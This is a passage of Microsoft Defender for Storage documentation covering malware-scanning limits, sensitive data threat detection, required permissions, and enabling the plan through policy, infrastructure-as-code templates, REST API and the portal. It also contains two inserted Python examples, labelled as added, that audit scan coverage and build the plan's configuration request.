by Customer Managed Key (CMK) is supported.

• Unsupported index tag results: Index tag scan result isn't supported in storage
accounts with Hierarchical namespace enabled (Azure Data Lake Storage Gen2).

• Event Grid: Event Grid topics that don't have public network access enabled (i.e.
private endpoint connections) are not supported by malware scanning in Defender
for Storage.


Throughput capacity and blob size limit 


• Scan throughput rate limit: Malware Scanning can process up to 2 GB per minute
for each storage account. If the rate of file upload momentarily exceeds this
threshold for a storage account, the system attempts to scan the files in excess of
the rate limit. If the rate of file upload consistently exceeds this threshold, some
blobs won't be scanned.


• Blob scan limit: Malware Scanning can process up to 2,000 files per minute for
each storage account. If the rate of file upload momentarily exceeds this threshold
for a storage account, the system attempts to scan the files in excess of the rate
limit. If the rate of file upload consistently exceeds this threshold, some blobs
won't be scanned.


• Blob size limit: The maximum size limit for a single blob to be scanned is 2 GB.
Blobs that are larger than the limit won't be scanned.
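Because the limits above mean some uploads are never scanned, a defender wants a way to find them. Here is an added example (not Microsoft's code) that audits a blob listing against the documented limits and the scan-result index tag described earlier; the tag values, the exact byte boundary behind "2 GB", and the grace period for a scan still in flight are assumptions, and the listing is constructed.

```python
"""Added example (not Microsoft's code): audit a blob listing for gaps in
Malware Scanning coverage using the scan-result index tag and the documented limits.
The listing below is constructed; in practice you would build BlobEntry objects
from a container listing that includes blob tags."""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

# Tag keys as named on the page; the tag *values* are assumptions.
RESULT_TAG = "Malware Scanning scan result"
TIME_TAG = "Malware Scanning scan time UTC"
CLEAN_VALUE = "No threats found"      # assumed
MALICIOUS_VALUE = "Malicious"         # assumed

# Limits from the page; the exact byte boundary behind "2 GB" is assumed.
MAX_BLOB_BYTES = 2 * 1024 ** 3
MAX_FILES_PER_MIN = 2000
MAX_BYTES_PER_MIN = 2 * 1024 ** 3
UNSUPPORTED_TYPES = {"AppendBlob", "PageBlob"}
PENDING_GRACE = timedelta(minutes=10)  # assumed allowance for near-real-time lag


@dataclass
class BlobEntry:
    name: str
    blob_type: str
    size: int
    last_modified: datetime
    tags: dict[str, str] = field(default_factory=dict)


def classify(blob: BlobEntry, now: datetime) -> str:
    """Label one blob. Only 'clean' means 'scanned and no threats found'.

    Index tags aren't tamper-resistant, so this detects absent or stale
    results; it can't prove a present tag wasn't rewritten by a tag writer."""
    if blob.blob_type in UNSUPPORTED_TYPES:
        return "unsupported-type"      # append/page blobs are never scanned
    if blob.size > MAX_BLOB_BYTES:
        return "over-size-limit"       # above the blob size limit: never scanned
    result = blob.tags.get(RESULT_TAG)
    if result is None:
        if now - blob.last_modified <= PENDING_GRACE:
            return "pending"           # scan may not have finished yet
        return "result-missing"        # no tag after the grace period: treat as unscanned
    if result == MALICIOUS_VALUE:
        return "malicious"
    if result == CLEAN_VALUE:
        return "clean"
    return "unknown-result"


def audit(blobs: list[BlobEntry], now: datetime) -> dict[str, list[str]]:
    """Group blob names by classification so coverage gaps stand out."""
    report: dict[str, list[str]] = defaultdict(list)
    for blob in blobs:
        report[classify(blob, now)].append(blob.name)
    return dict(report)


def minutes_over_limit(blobs: list[BlobEntry]) -> list[str]:
    """ISO timestamps of minutes whose uploads exceeded the per-account rate limits,
    i.e. windows in which the service may have skipped blobs."""
    files: dict[datetime, int] = defaultdict(int)
    size: dict[datetime, int] = defaultdict(int)
    for blob in blobs:
        minute = blob.last_modified.replace(second=0, microsecond=0)
        files[minute] += 1
        size[minute] += blob.size
    return [m.isoformat() for m in sorted(files)
            if files[m] > MAX_FILES_PER_MIN or size[m] > MAX_BYTES_PER_MIN]


# Constructed sample listing (not real data).
NOW = datetime(2023, 8, 1, 12, 0, tzinfo=timezone.utc)
SAMPLE_LISTING = [
    BlobEntry("receipts/a.pdf", "BlockBlob", 120_000, NOW - timedelta(hours=1),
              {RESULT_TAG: CLEAN_VALUE, TIME_TAG: "2023-08-01T11:00:09Z"}),
    BlobEntry("receipts/b.exe", "BlockBlob", 500_000, NOW - timedelta(hours=1),
              {RESULT_TAG: MALICIOUS_VALUE, TIME_TAG: "2023-08-01T11:00:12Z"}),
    BlobEntry("receipts/c.zip", "BlockBlob", 700_000, NOW - timedelta(hours=2)),
    BlobEntry("receipts/d.pdf", "BlockBlob", 1_000, NOW - timedelta(minutes=2)),
    BlobEntry("vhd/disk.vhd", "PageBlob", 10_000_000, NOW - timedelta(hours=3)),
    BlobEntry("big/dump.bin", "BlockBlob", 3 * 1024 ** 3, NOW - timedelta(hours=3)),
]


def sample_report() -> dict[str, list[str]]:
    """Run the audit over the constructed listing."""
    return audit(SAMPLE_LISTING, NOW)


if __name__ == "__main__":
    for label, names in sample_report().items():
        print(f"{label:16s} {names}")
    print("minutes over rate limit:", minutes_over_limit(SAMPLE_LISTING))
```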


Blob uploads and index tag updates


Upon uploading a blob to the storage account, the malware scanning initiates an extra 
read operation and updates the index tag. In most cases, these operations don't 
generate significant load. 


Impact on access and storage IOPS 


Despite the scanning process, access to uploaded data remains unaffected, and the 
impact on storage Input/Output Operations Per Second (IOPS) is minimal. 


Next steps 


Learn more on how to set up response for malware scanning results. 


Detect threats to sensitive data 
Sensitive data threat detection lets you efficiently prioritize and examine security alerts
by considering the sensitivity of the data that could be at risk, leading to better
detection and preventing data breaches. By quickly identifying and addressing the most
significant risks, this capability helps security teams reduce the likelihood of data
breaches and enhances sensitive data protection by detecting exposure events and
suspicious activities on resources containing sensitive data.


This is a configurable feature in the new Defender for Storage plan. You can choose to 
enable or disable it with no additional cost. 


Learn more about scope and limitations of sensitive data scanning. 


How does sensitive data discovery work? 


Sensitive data threat detection is powered by the sensitive data discovery engine, an 
agentless engine that uses a smart sampling method to find resources with sensitive 
data. 


The service is integrated with Microsoft Purview's sensitive information types (SITs) and 
classification labels, allowing seamless inheritance of your organization's sensitivity 
settings. This ensures that the detection and protection of sensitive data aligns with your 
established policies and procedures. 
Upon enablement, the engine initiates an automatic scanning process across all
supported storage accounts. Results are typically generated within 24 hours.
Additionally, newly created storage accounts under protected subscriptions are scanned
within six hours of their creation. Recurring scans are scheduled to occur weekly after
the enablement date. This is the same engine that Defender CSPM uses to discover
sensitive data.


Prerequisites 


Sensitive data threat detection is available for Blob storage accounts, including: 
Standard general-purpose V1, Standard general-purpose V2, Azure Data Lake Storage 
Gen2, and Premium block blobs. Learn more about the availability of Defender for 
Storage features. 


To enable sensitive data threat detection at subscription and storage account levels, you 
need to have the relevant data-related permissions from the Subscription owner or 
Storage account owner roles. Learn more about the roles and permissions required for 
sensitive data threat detection. 


Enabling sensitive data threat detection 


Sensitive data threat detection is enabled by default when you enable Defender for 
Storage. You can enable it or disable it in the Azure portal or with other at-scale 
methods. This feature is included in the price of Defender for Storage. 


Using the sensitivity context in the security alerts


The sensitive data threat detection capability helps security teams identify and prioritize
data security incidents for faster response times. Defender for Storage alerts include
findings of sensitivity scanning and indications of operations that have been performed
on resources containing sensitive data.


In the alert’s extended properties, you can find sensitivity scanning findings for a blob 
container: 


• Sensitivity scanning time UTC - when the last scan was performed
• Top sensitivity label - the most sensitive label found in the blob container
• Sensitive information types - information types that were found and whether they
are based on custom rules
• Sensitive file types - the file types of the sensitive data


Integrate with the organizational sensitivity settings in Microsoft Purview (optional)


When you enable sensitive data threat detection, the sensitive data categories include 
built-in sensitive information types (SITs) in the default list of Microsoft Purview. This will 
affect the alerts you receive from Defender for Storage: storage or containers that are 
found with these SITs are marked as containing sensitive data. 


To customize the Data Sensitivity Discovery for your organization, you can create custom
sensitive information types (SITs) and connect to your organizational settings with a
single-step integration. Learn more here.


You also can create and publish sensitivity labels for your tenant in Microsoft Purview 
with a scope that includes Items and Schematized data assets and Auto-labeling rules 
(recommended). Learn more about sensitivity labels in Microsoft Purview. 


Next steps 


In this article, you learned about Microsoft Defender for Storage's sensitive data
scanning.


Enable Defender for Storage 


Deploy Microsoft Defender for Storage 
Microsoft Defender for Storage is an Azure-native solution offering an advanced layer of
intelligence for threat detection and mitigation in storage accounts, powered by
Microsoft Threat Intelligence, Microsoft Defender Antimalware technologies, and
Sensitive Data Discovery. With protection for Azure Blob Storage, Azure Files, and Azure
Data Lake Storage services, it provides a comprehensive alert suite, near real-time
Malware Scanning (add-on), and sensitive data threat detection (no extra cost), allowing
quick detection, triage, and response to potential security threats with contextual
information. It helps prevent the three major impacts on your data and workload:
malicious file uploads, sensitive data exfiltration, and data corruption.


With Microsoft Defender for Storage, organizations can customize their protection and 
enforce consistent security policies by enabling it on subscriptions and storage accounts 
with granular control and flexibility. 


Tip


If you're currently using Microsoft Defender for Storage classic, consider migrating 
to the new plan, which offers several benefits over the classic plan. 


Availability 


Aspect                   Details

Release state:           General Availability (GA)

Feature availability:    - Activity monitoring (security alerts) - General Availability (GA)
                         - Malware Scanning - General Availability (GA)
                         - Sensitive data threat detection (Sensitive Data Discovery) - Preview

                         Visit the pricing page to learn more.

Required roles and       For Malware Scanning and sensitive data threat detection at subscription and
permissions:             storage account levels, you need Owner roles (subscription owner/storage
                         account owner) or specific roles with corresponding data actions. To enable
                         Activity Monitoring, you need 'Security Admin' permissions. Read more about
                         the required permissions.

Clouds:                  ✔ Azure Commercial clouds*
                         ✔ Azure Government (only activity monitoring support on the classic plan)
                         ✘ Azure China 21Vianet
                         ✘ Connected AWS accounts

*Azure DNS Zone is not supported for Malware Scanning and sensitive data threat
detection.


Prerequisites for Malware scanning 


To enable and configure Malware Scanning, you must have Owner roles (such as 
Subscription Owner or Storage Account Owner) or specific roles with the necessary data 
actions. Learn more about the required permissions. 


Set up and configure Microsoft Defender for Storage


To enable and configure Microsoft Defender for Storage and ensure maximum 
protection and cost optimization, the following configuration options are available: 


• Enable/disable Microsoft Defender for Storage at the subscription and storage
account levels.

• Enable/disable the Malware Scanning or sensitive data threat detection
configurable features.

• Set a monthly cap ("capping") on the Malware Scanning per storage account per
month to control costs (default value is 5,000 GB).

• Configure methods to set up response to malware scanning results.

• Configure methods for saving malware scanning results logging.


Tip


The Malware Scanning feature has advanced configurations to help security teams 
support different workflows and requirements. 


• Override subscription-level settings to configure specific storage accounts with
custom configurations that differ from the settings configured at the subscription
level.


There are several ways to enable and configure Defender for Storage: using the Azure
built-in policy (the recommended method), programmatically using Infrastructure as
Code templates, including Terraform, Bicep, and ARM templates, using the Azure portal,
or directly with the REST API.


Enabling Defender for Storage via a policy is recommended because it facilitates 
enablement at scale and ensures that a consistent security policy is applied across all 
existing and future storage accounts within the defined scope (such as entire 
management groups). This keeps the storage accounts protected with Defender for 
Storage according to the organization's defined configuration. 


Note


To prevent migrating back to the legacy classic plan, make sure to disable the old
Defender for Storage policies. Look for and disable policies named Configure Azure
Defender for Storage to be enabled, Azure Defender for Storage should be
enabled, or Configure Microsoft Defender for Storage to be enabled (per-storage
account plan), or deny policies that prevent the disablement of the classic plan.


Next steps 


• Learn how to enable and configure the Defender for Storage plan at scale with an
Azure built-in policy.


Required permissions for enabling 
Defender for Storage and its features 
This article lists the permissions required to enable Defender for Storage and its
features.


Microsoft Defender for Storage is an Azure-native layer of security intelligence that 
detects potential threats to your storage accounts. It helps prevent the three major 
impacts on your data and workload: malicious file uploads, sensitive data exfiltration, 
and data corruption. 


• Activity monitoring: Detects suspicious activities in storage accounts by analyzing
data plane and control plane activities and using Microsoft Threat Intelligence,
behavioral modeling, and machine learning.

• Malware Scanning: Scans all uploaded blobs in near-real time using Microsoft
Defender Antivirus to protect storage accounts from malicious content.

• Sensitive data threat detection: Prioritizes security alerts based on data sensitivity
discovered by the Sensitive Data Discovery Engine, and detects exposure events and
suspicious activities, enhancing protection against data breaches.


Depending on the scenario, you need different levels of permissions to enable Defender 
for Storage and its features. You can enable and configure Defender for Storage at the 
subscription level or at the storage account level. You can also use built-in Azure policies 
to enable Defender for Storage and enforce its enablement on a desired scope. 


The following table summarizes the permissions you need for each scenario. The
permissions are either built-in Azure roles or action sets that you can assign to custom
roles.

Capability            Subscription level                    Storage account level

Activity monitoring   Security Admin or                     Security Admin or
                      Pricings/read, Pricings/write         Microsoft.Security/defenderforstoragesettings/read,
                                                            Microsoft.Security/defenderforstoragesettings/write

Malware scanning      Subscription Owner or action set 1    Storage Account Owner or action set 2

Sensitive data        Subscription Owner or action set 1    Storage Account Owner or action set 2
threat detection


Note


Activity monitoring is always enabled when you enable Defender for Storage. 


The action sets are collections of Azure resource provider operations that you can use to
create custom roles. The action sets for enabling Defender for Storage and its features
are:


Action set 1: Subscription level enablement and configuration


Microsoft.Security/pricings/write 
Microsoft.Security/pricings/read 
Microsoft.Security/pricings/SecurityOperators/read 
Microsoft.Security/pricings/SecurityOperators/write 
Microsoft.Authorization/roleAssignments/read 
Microsoft.Authorization/roleAssignments/write 
Microsoft.Authorization/roleAssignments/delete 


Action set 2: Storage account level enablement and configuration


Microsoft.Storage/storageAccounts/write 
Microsoft.Storage/storageAccounts/read 
Microsoft.Security/defenderforstoragesettings/read 
Microsoft.Security/defenderforstoragesettings/write 
Microsoft.EventGrid/eventSubscriptions/read 
Microsoft.EventGrid/eventSubscriptions/write 
Microsoft.EventGrid/eventSubscriptions/delete 
Microsoft.Authorization/roleAssignments/read 
Microsoft.Authorization/roleAssignments/write 
Microsoft.Authorization/roleAssignments/delete 


Enable and configure at scale with an 
Azure built-in policy 
Enabling Defender for Storage via a policy is recommended because it facilitates
enablement at scale and ensures that a consistent security policy is applied across all
existing and future storage accounts within the defined scope (such as entire
management groups). This keeps the storage accounts protected with Defender for
Storage according to the organization's defined configuration.


Tip


You can always configure specific storage accounts with custom configurations 
that differ from the settings configured at the subscription level (override 
subscription-level settings). 


Azure built-in policy 


To enable and configure Defender for Storage at scale with an Azure built-in policy, 
follow these steps: 


1. Sign in to the Azure portal and navigate to the Policy dashboard.

2. In the Policy dashboard, select Definitions from the left-side menu.

3. In the "Security Center" category, search for and then select Configure Microsoft
Defender for Storage to be enabled. This policy enables all Defender for Storage
capabilities: Activity Monitoring, Malware Scanning and Sensitive Data Threat
Detection. You can also get it here: List of built-in policy definitions. If you want to
enable a policy without the configurable features, use Configure basic Microsoft
Defender for Storage to be enabled (Activity Monitoring only).


[Screenshot: the Policy | Definitions page in the Azure portal]


4. Select the policy and review it. 


5. Select Assign and edit the policy details. You can fine-tune, edit, and add custom
rules to the policy.


[Screenshot: Home > Policy | Definition: the built-in policy definition page for Configure Microsoft Defender for Storage to be enabled, showing the definition ID /providers/Microsoft.Authorization/policyDefinitions/cfdc5972-75b3-4418-8ae1-7f5c36839390]


6. Once you have completed reviewing, select Review + create. 


7. Select Create to assign the policy. 


Tip


Malware Scanning can be configured to send scanning results to the following:

• Event Grid custom topic - for near-real time automatic response based on every
scanning result. Learn more about how to configure malware scanning to send scanning
events to an Event Grid custom topic.

• Log Analytics workspace - for storing every scan result in a centralized log
repository for compliance and audit. Learn more about how to configure malware
scanning to send scanning results to a Log Analytics workspace.


Learn more on how to set up response for malware scanning results. 


Next steps 


Learn how to enable and configure Microsoft Defender for Storage with IaC templates.


Enable and configure with Infrastructure 
as Code templates 
We recommend that you enable Defender for Storage on the subscription level. Doing
so ensures all storage accounts in the subscription will be protected, including future
ones.


Tip


You can always configure specific storage accounts with custom configurations
that differ from the settings configured at the subscription level (override
subscription-level settings).


Enable on a subscription 


Terraform template 


To enable and configure Microsoft Defender for Storage at the subscription level
using Terraform, you can use the following code snippet:


    resource "azurerm_security_center_subscription_pricing" "DefenderForStorage" {
      tier          = "Standard"
      resource_type = "StorageAccounts"
      subplan       = "DefenderForStorageV2"

      # On-upload malware scanning with the default 5,000 GB monthly cap per storage account
      extension {
        name = "OnUploadMalwareScanning"
        additional_extension_properties = {
          CapGBPerMonthPerStorageAccount = "5000"
        }
      }

      # Sensitive data threat detection
      extension {
        name = "SensitiveDataDiscovery"
      }
    }


Modifying the monthly cap for malware scanning 


To modify the monthly cap for malware scanning per storage account, adjust the 
CapGBPerMonthPerStorageAccount parameter to your preferred value. This parameter 
sets a cap on the maximum data that can be scanned for malware each month per 
storage account. If you want to permit unlimited scanning, assign the value "-1". 
The default limit is set at 5,000 GB. 


Disabling features 


If you want to turn off the on-upload malware scanning or sensitive data threat 
detection features, you can remove the corresponding extension block from the 
Terraform code. 


Disabling the entire Defender for Storage plan 


To disable the entire Defender for Storage plan, set the tier property value to
"Free" and remove the subplan and extension properties.


Learn more about the azurerm_security_center_subscription_pricing resource by
referring to the azurerm_security_center_subscription_pricing documentation.
Additionally, you can find comprehensive details on the Terraform provider for
Azure in the Terraform AzureRM Provider documentation.


Bicep template 


To enable and configure Microsoft Defender for Storage at the subscription level 
using Bicep, make sure your target scope is set to subscription, and add the 
following to your Bicep template: 


    resource StorageAccounts 'Microsoft.Security/pricings@2023-01-01' = {
      name: 'StorageAccounts'
      properties: {
        pricingTier: 'Standard'
        subPlan: 'DefenderForStorageV2'
        extensions: [
          {
            // On-upload malware scanning with the default 5,000 GB monthly cap per storage account
            name: 'OnUploadMalwareScanning'
            isEnabled: 'True'
            additionalExtensionProperties: {
              CapGBPerMonthPerStorageAccount: '5000'
            }
          }
          {
            // Sensitive data threat detection
            name: 'SensitiveDataDiscovery'
            isEnabled: 'True'
          }
        ]
      }
    }

Modifying the monthly cap for malware scanning 


To modify the monthly cap for malware scanning per storage account, adjust the 
CapGBPerMonthPerStorageAccount parameter to your preferred value. This parameter 
sets a cap on the maximum data that can be scanned for malware each month per 
storage account. If you want to permit unlimited scanning, assign the value -1. The 
default limit is set at 5,000 GB. 


Disabling features 


If you want to turn off the On-upload malware scanning or Sensitive data threat
detection features, change the isEnabled value to False under the corresponding
extension (OnUploadMalwareScanning or SensitiveDataDiscovery).


Disabling the entire Defender for Storage plan


To disable the entire Defender for Storage plan, set the pricingTier property value
to Free and remove the subPlan and extensions properties.


Learn more about the Bicep template in the Microsoft security/pricings 
documentation. 


Azure Resource Manager template 


To enable and configure Microsoft Defender for Storage at the subscription level
using an ARM (Azure Resource Manager) template, add this JSON snippet to the
resources section of your ARM template:


    {
      "type": "Microsoft.Security/pricings",
      "apiVersion": "2023-01-01",
      "name": "StorageAccounts",
      "properties": {
        "pricingTier": "Standard",
        "subPlan": "DefenderForStorageV2",
        "extensions": [
          {
            "name": "OnUploadMalwareScanning",
            "isEnabled": "True",
            "additionalExtensionProperties": {
              "CapGBPerMonthPerStorageAccount": "5000"
            }
          },
          {
            "name": "SensitiveDataDiscovery",
            "isEnabled": "True"
          }
        ]
      }
    }


Modifying the monthly cap for malware scanning 


To modify the monthly threshold for malware scanning in your storage accounts,
simply adjust the CapGBPerMonthPerStorageAccount parameter to your preferred
value. This parameter sets a cap on the maximum data that can be scanned for
malware each month, per storage account. If you want to permit unlimited
scanning, assign the value -1. The default limit is set at 5,000 GB.


Disabling features 


If you want to turn off the on-upload malware scanning or sensitive data threat
detection features, change the isEnabled value to False under the corresponding
extension (OnUploadMalwareScanning or SensitiveDataDiscovery).


Disabling the entire Defender for Storage plan


To disable the entire Defender plan, set the pricingTier property value to Free and
remove the subPlan and extensions properties.


Learn more about the ARM template in the Microsoft.Security/Pricings 
documentation. 


Next steps 


Learn more about the Microsoft.Security/DefenderForStorageSettings API 
documentation. 


Enable and configure with REST API 
We recommend that you enable Defender for Storage on the subscription level. Doing 
so ensures all storage accounts in the subscription will be protected, including future 
ones. 


Tip 
You can always configure specific storage accounts with custom configurations 
that differ from the settings configured at the subscription level (override 
subscription-level settings). 


Enable on a subscription 


To enable and configure Microsoft Defender for Storage at the subscription level 
using REST API, create a PUT request with this endpoint (replace the 
subscriptionId in the endpoint URL with your own Azure subscription ID): 


PUT https://management.azure.com/subscriptions/{subscriptionId}/providers/Microsoft.Security/pricings/StorageAccounts?api-version=2023-01-01 


And add the following request body: 


{
  "properties": {
    "extensions": [
      {
        "name": "OnUploadMalwareScanning",
        "isEnabled": "True",
        "additionalExtensionProperties": {
          "CapGBPerMonthPerStorageAccount": "5000"
        }
      },
      {
        "name": "SensitiveDataDiscovery",
        "isEnabled": "True"
      }
    ],
    "subPlan": "DefenderForStorageV2",
    "pricingTier": "Standard"
  }
}

To modify the monthly threshold for malware scanning in your storage accounts, 
adjust the CapGBPerMonthPerStorageAccount parameter to your preferred value. This 
parameter sets a cap on the maximum data that can be scanned for malware each 
month, per storage account. If you want to permit unlimited scanning, assign the 
value -1. The default limit is set at 5,000 GB. 


If you want to turn off the on-upload malware scanning or Sensitive data threat 
detection features, you can change the isEnabled value to False under Sensitive 
data discovery. 


To disable the entire Defender plan, set the pricingTier property value to Free and 
remove the subPlan and extensions properties. 


Learn more about updating Defender plans with the REST API in HTTP, Java, Go and 
JavaScript. 
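As an added example (not Microsoft's code and not a snippet from this page), the following Python builds the subscription-level PUT request described above, including both body variants the text mentions (a capped or unlimited malware-scanning quota, and the Free-tier body that disables the plan), and sends it with a bearer token you obtain separately. The helper names are mine; the endpoint, API version, property names and the 5,000 GB / -1 conventions are the ones on the page.

```python
"""Build and send the subscription-level Defender for Storage pricing request.

Added example; the request shape follows the page, the helpers are my own.
"""
import json
import urllib.request

ARM_ENDPOINT = "https://management.azure.com"
API_VERSION = "2023-01-01"        # pricings API version used on the page
DEFAULT_CAP_GB = 5000             # page: default monthly cap per storage account
UNLIMITED = -1                    # page: -1 permits unlimited scanning


def pricing_url(subscription_id):
    """PUT endpoint for the StorageAccounts pricing (plan) resource."""
    return (f"{ARM_ENDPOINT}/subscriptions/{subscription_id}/providers/"
            f"Microsoft.Security/pricings/StorageAccounts?api-version={API_VERSION}")


def pricing_body(malware_scanning=True, cap_gb_per_month=DEFAULT_CAP_GB,
                 sensitive_data_discovery=True):
    """Request body that enables the DefenderForStorageV2 plan.

    The page's snippet passes the booleans and the cap as strings, so the
    Python values are converted here ("True"/"False", "5000", "-1")."""
    if cap_gb_per_month != UNLIMITED and cap_gb_per_month <= 0:
        raise ValueError("cap must be a positive number of GB, or -1 for unlimited")
    return {
        "properties": {
            "pricingTier": "Standard",
            "subPlan": "DefenderForStorageV2",
            "extensions": [
                {
                    "name": "OnUploadMalwareScanning",
                    "isEnabled": str(malware_scanning),
                    "additionalExtensionProperties": {
                        "CapGBPerMonthPerStorageAccount": str(cap_gb_per_month),
                    },
                },
                {
                    "name": "SensitiveDataDiscovery",
                    "isEnabled": str(sensitive_data_discovery),
                },
            ],
        }
    }


def disable_body():
    """Body that turns the whole plan off: tier Free, no subPlan or extensions."""
    return {"properties": {"pricingTier": "Free"}}


def put_pricing(subscription_id, body, bearer_token, timeout=30):
    """Send the PUT with an ARM access token and return the parsed response.

    Nothing below sends a request; this is the call you make once you have a
    token (for example from `az account get-access-token`)."""
    req = urllib.request.Request(
        pricing_url(subscription_id),
        data=json.dumps(body).encode("utf-8"),
        method="PUT",
        headers={"Authorization": f"Bearer {bearer_token}",
                 "Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


if __name__ == "__main__":
    # Print the bodies so they can be compared with the page's snippets.
    print(json.dumps(pricing_body(), indent=2))
    print(json.dumps(pricing_body(cap_gb_per_month=UNLIMITED), indent=2))
    print(json.dumps(disable_body(), indent=2))
```

The token can come from `az account get-access-token --resource https://management.azure.com` or from azure-identity's `DefaultAzureCredential`; the builders themselves are offline, which is what lets you diff the generated body against the page before anything is changed in the subscription.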


Tip 


Malware Scanning can be configured to send scanning results to the following: 
Event Grid custom topic - for near-real time automatic response based on every 
scanning result. Learn more how to configure malware scanning to send scanning 
events to an Event Grid custom topic. 

Log Analytics workspace - for storing every scan result in a centralized log 
repository for compliance and audit. Learn more how to configure malware 
scanning to send scanning results to a Log Analytics workspace. 


Learn more on how to set up response for malware scanning results. 


Next steps 


e Learn how to enable and Configure the Defender for Storage plan at scale with an 
Azure built-in policy. 


Enable and configure with the Azure portal 


We recommend that you enable Defender for Storage on the subscription level. Doing 
so ensures all current and future storage accounts in the subscription are protected. 


Tip 


You can always configure specific storage accounts with custom configurations 
that differ from the settings configured at the subscription level (override 
subscription-level settings). 


Enable on a subscription (recommended) 


To enable Defender for Storage at the subscription level using the Azure portal: 
1. Sign in to the Azure portal. 
2. Navigate to Microsoft Defender for Cloud > Environment settings. 


3. Select the subscription for which you want to enable Defender for Storage. 




4. On the Defender plans page, locate Storage in the list and select On and Save. 
If you currently have Defender for Storage enabled with per-transaction 
pricing, select the New pricing plan available link and confirm the pricing 
change. 




Microsoft Defender for Storage is now enabled for this subscription, and is fully 
protected, including on-upload malware scanning and sensitive data threat 
detection. 


If you want to turn off the on-upload malware scanning or sensitive data threat 
detection, you can select Settings and change the status of the relevant feature to 
Off and save the changes. 


If you want to change the malware scanning size cap per storage account per 
month, change the settings in Edit configuration and save the changes. 


If you want to disable the plan, turn status button to Off for the Storage plan on the 
Defender plans page and save the changes. 


Tip 


Malware Scanning can be configured to send scanning results to the following: 
Event Grid custom topic - for near-real time automatic response based on every 
scanning result. Learn more how to configure malware scanning to send scanning 
events to an Event Grid custom topic. 

Log Analytics workspace - for storing every scan result in a centralized log 
repository for compliance and audit. Learn more how to configure malware 
scanning to send scanning results to a Log Analytics workspace. 


Next steps 


e Learn how to enable and Configure the Defender for Storage plan at scale with an 
Azure built-in policy. 
e Learn more on how to set up response for malware scanning results. 


Advanced configurations for malware scanning 


Malware Scanning can be configured to send scanning results to the following: 


e Event Grid custom topic - for near-real time automatic response based on every 
scanning result. 

e Log Analytics workspace - for storing every scan result in a centralized log 
repository for compliance and audit. 


Learn more on how to set up response for malware scanning results. 


Tip 


We recommend you try the Ninja training instructions, a hands-on lab, to try out 
malware scanning in Defender for Storage, using detailed step-by-step instructions 
on how to test malware scanning end-to-end with setting up responses to 
scanning results. This is part of the ‘labs’ project that helps customers get ramped 
up with Microsoft Defender for Cloud and provides hands-on practical experience 
with its capabilities. 


Setting up logging for malware scanning 


For each storage account enabled with malware scanning, you can define a Log 
Analytics workspace destination to store every scan result in a centralized log repository 
that is easy to query. 
Before sending scan results to Log Analytics, create a Log Analytics workspace or use an 
existing one. 


To configure the Log Analytics destination, navigate to the relevant storage account, 
open the Microsoft Defender for Cloud tab, and select the settings to configure. 


This configuration can be performed using REST API as well: 


Request URL: 


HTTP 


PUT https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroup}/providers/Microsoft.Storage/storageAccounts/{accountName}/providers/Microsoft.Security/DefenderForStorageSettings/current/providers/Microsoft.Insights/diagnosticSettings/service?api-version=2021-05-01-preview 


Request Body: 


HTTP 


{
  "properties": {
    "workspaceId": "/subscriptions/{subscriptionId}/resourcegroups/{resourceGroup}/providers/microsoft.operationalinsights/workspaces/{workspaceName}",
    "logs": [
      {
        "category": "ScanResults",
        "enabled": true,
        "retentionPolicy": {
          "enabled": true,
          "days": 180
        }
      }
    ]
  }
}

Setting up Event Grid for malware scanning 


For each storage account enabled with malware scanning, you can configure it to send 
every scan result as an Event Grid event for automation purposes. 


1. To configure Event Grid for sending scan results, you'll first need to create a 
custom topic in advance. Refer to the Event Grid documentation on creating 
custom topics for guidance. Ensure that the destination Event Grid custom topic is 
created in the same region as the storage account from which you want to send 
scan results. 


2. To configure the Event Grid custom topic destination, go to the relevant storage 
account, open the Microsoft Defender for Cloud tab, and select the settings to 
configure. 


Note 


When you set an Event Grid custom topic, you should set Override Defender for 
Storage subscription-level settings to On to make sure it overrides the 
subscription-level settings. 
This configuration can be performed using REST API as well: 
Request URL: 


HTTP 


PUT https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroup}/providers/Microsoft.Storage/storageAccounts/{accountName}/providers/Microsoft.Security/DefenderForStorageSettings/current?api-version=2022-12-01-preview 


Request Body: 


HTTP 


{
  "properties": {
    "isEnabled": true,
    "malwareScanning": {
      "onUpload": {
        "isEnabled": true,
        "capGBPerMonth": 5000
      },
      "scanResultsEventGridTopicResourceId": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroup}/providers/Microsoft.EventGrid/topics/{EventGridTopicName}"
    },
    "sensitiveDataDiscovery": {
      "isEnabled": true
    },
    "overrideSubscriptionLevelSettings": true
  }
}


Override Defender for Storage subscription-level settings 


Each storage account in a subscription inherits the subscription-level Defender for 
Storage settings. Use Override Defender for Storage subscription-level settings to 
configure individual storage accounts differently from the settings configured at 
the subscription level. 


Overriding the subscription-level settings is usually done for the following scenarios: 


e Enable/disable the Malware Scanning or the Data sensitivity threat detection 
features. 

e Configure custom settings for Malware Scanning. 

e Disable Microsoft Defender for Storage on specific storage accounts. 


Note 


We recommend that you enable Defender for Storage on the entire subscription to 
protect all existing and future storage accounts in it. However, there are some cases 
where you would want to exclude specific storage accounts from Defender 
protection. If you've decided to exclude, follow the steps below to use the override 
setting and then disable the relevant storage account. If you are using Defender for 
Storage (classic), you can also exclude storage accounts. 


Azure portal 


To configure the settings of individual storage accounts different from those configured 
on the subscription level using the Azure portal: 
1. Sign in to the Azure portal. 
2. Navigate to your storage account that you want to configure custom settings. 


3. In the storage account menu, in the Security + networking section, select 
Microsoft Defender for Cloud. 


4. Select Settings in Microsoft Defender for Storage. 


5. Set the status of Override Defender for Storage subscription-level settings (under 
Advanced settings) to On. This ensures that the settings are saved only for this 
storage account and are not overwritten by the subscription-level settings. 


6. Configure the settings you want to change: 


a. To enable malware scanning or sensitive data threat detection, set the status to 
On. 


b. To modify the settings of malware scanning: 
i. Switch the On-upload malware scanning to On if it’s not already enabled. 


ii. To adjust the monthly threshold for malware scanning in your storage 
accounts, you can modify the parameter called Set limit of GB scanned per 
month to your desired value. This parameter determines the maximum 
amount of data that can be scanned for malware each month, specifically for 
each storage account. If you wish to allow unlimited scanning, you can 
uncheck this parameter. By default, the limit is set at 5,000 GB. 


7. To disable Defender for Storage on this storage account, set the status of Microsoft 
Defender for Storage to Off. 


8. Select Save. 


REST API 


To configure the settings of individual storage accounts different from those configured 
on the subscription level using REST API: 


